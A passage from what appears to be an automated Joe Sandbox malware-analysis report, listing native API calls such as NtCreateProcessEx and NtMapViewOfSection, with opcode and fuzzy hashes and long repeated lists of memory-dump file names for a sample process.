              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: DirectoryFileQuery
              • String ID:
              • API String ID: 3295332484-0
              • Opcode ID: aa489c70d001287871ed09086ccc638b5d007d76ebab8c9813731f5f86f8a090
              • Instruction ID: cde5a1f30ecd2a6b62bbe33fb6465ebb8a6528e55ceab80d933f3f03eade89f1
              • Opcode Fuzzy Hash: aa489c70d001287871ed09086ccc638b5d007d76ebab8c9813731f5f86f8a090
              • Instruction Fuzzy Hash: FF016BB6201249BF9B10CE8ADCD4DEBBB6CFB8D6A4B444005FB1897211C270AC51C7B0
              APIs
              • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19900
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: SectionView
              • String ID:
              • API String ID: 1323581903-0
              • Opcode ID: 1364e08b0aa50443ab7af7f3ee8eea4d2d70c2781012a4f282745e95a97fa0ce
              • Instruction ID: 736d5dbeeba6593163ea9f68a43978bf427c4504feeccb4141ec62aeca3edc27
              • Opcode Fuzzy Hash: 1364e08b0aa50443ab7af7f3ee8eea4d2d70c2781012a4f282745e95a97fa0ce
              • Instruction Fuzzy Hash: 5A0166B6200259BF9B10DECADCC4DEBBB6CFB8D694B444015BB1997212C230AC51CBB0
              APIs
              • NtNotifyChangeDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A19120
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ChangeDirectoryFileNotify
              • String ID:
              • API String ID: 1357473996-0
              • Opcode ID: f2410bbea1fd0bec9ab71db184a33dad65b3e2885eabca7a5c9fd1c806fa8c67
              • Instruction ID: 0b5190d364a29bdeaa2c4ff2df7561dcd77091494d1604455542753215c06957
              • Opcode Fuzzy Hash: f2410bbea1fd0bec9ab71db184a33dad65b3e2885eabca7a5c9fd1c806fa8c67
              • Instruction Fuzzy Hash: E6F0AFB6145249BF9B10DE9ADCC8DFB7B6CFB9D7A0B544005FA5887201C230AD51CBB0
              APIs
              • NtWriteFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A195EC
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 333195f0f366f4741d12a3b9efd3f112d6dfb85395c3254af154bbfbb966ad95
              • Instruction ID: 65f7720b819163f2a6866cfc448ecef3cffe3150fb0a274725ec1b23b064f752
              • Opcode Fuzzy Hash: 333195f0f366f4741d12a3b9efd3f112d6dfb85395c3254af154bbfbb966ad95
              • Instruction Fuzzy Hash: 92F079B6201259BF9710DECADCC4DEBBBACFB8D6A4B444015BB1897201C230AD55C7B0
              APIs
              • NtCreateProcessEx.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A18FAC
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: a6f4b07468960df21d1ebee3a29a1283bb1a147ce1183686491804e7216e7359
              • Instruction ID: 959dac38a9767d518afc0dc6e9fcfd5cf9f95c45aa473eae246476b5db652493
              • Opcode Fuzzy Hash: a6f4b07468960df21d1ebee3a29a1283bb1a147ce1183686491804e7216e7359
              • Instruction Fuzzy Hash: 0BF0AFB6600249BFD710CE9ADDC4DEB7B6DFB8D7A4B444405BB1987201C630AD51C7B0
              APIs
              • NtAccessCheck.NTDLL(?,?,?,?,?,?,?,?), ref: 00A19208
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: AccessCheck
              • String ID:
              • API String ID: 3492747997-0
              • Opcode ID: fe4dabadc239b5d6556cfd1945a7cbe24da7b770a8e04c9ae8b2e0f1a2f3f97f
              • Instruction ID: 75ebd7e35a228b1d4b2a177752bce1b4faf09b862f54c13d369b280cf6dc2fdd
              • Opcode Fuzzy Hash: fe4dabadc239b5d6556cfd1945a7cbe24da7b770a8e04c9ae8b2e0f1a2f3f97f
              • Instruction Fuzzy Hash: CDF067B6104259BF9B10DECADCC8DEBBB6CEB8D6A4B444119BA1887211C270AD50CBB0
              APIs
              • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00A18EE8
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 005a560ec35569b9d244c87dffe834aec02cd73cd06e69f103e33fc285314297
              • Instruction ID: 95863f1c60aa4344f17c6838957131a2cb7555a8f72cf8444026487f5ddd978e
              • Opcode Fuzzy Hash: 005a560ec35569b9d244c87dffe834aec02cd73cd06e69f103e33fc285314297
              • Instruction Fuzzy Hash: C4F0D0B6105199BFA710CF96DCC8DF77FACEB9E7A4B444105B60887101C130AC50C7B0
              APIs
              • NtCreateProcess.NTDLL(?,?,?,?,?,?,?,?), ref: 00A18F54
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: b73596ffd29f40ccd532700608e11a96417f6c3fbe183279fc65dc61ae2414c0
              • Instruction ID: 6c954bdfc214776766d4100d4081e296327bba20e89164e4fc368b91ff7f8bef
              • Opcode Fuzzy Hash: b73596ffd29f40ccd532700608e11a96417f6c3fbe183279fc65dc61ae2414c0
              • Instruction Fuzzy Hash: F1F0B7B6200249BF9710CE8ADDC8DEB7BACEB9D7A0B448005BA1887201C674AD51C7B0
              APIs
              • NtDuplicateObject.NTDLL(?,?,?,?,?,?,?), ref: 00A19750
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: DuplicateObject
              • String ID:
              • API String ID: 3677547684-0
              • Opcode ID: 842b537c289f201d57fc24e413a7f4924c113ed8a5a08c472ae50639051d35f5
              • Instruction ID: 6f58a5fc3fd33d28c894c42d3051d81073d5bef1db39aabe33ae5e4034c04914
              • Opcode Fuzzy Hash: 842b537c289f201d57fc24e413a7f4924c113ed8a5a08c472ae50639051d35f5
              • Instruction Fuzzy Hash: 51F0ACB6204259BFA750CE9AEC88DF77B6CEB897A4B048115FA1887141D271AD40D7B0
              APIs
              • NtCreateKey.NTDLL(?,?,?,?,?,?,?), ref: 00A19324
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
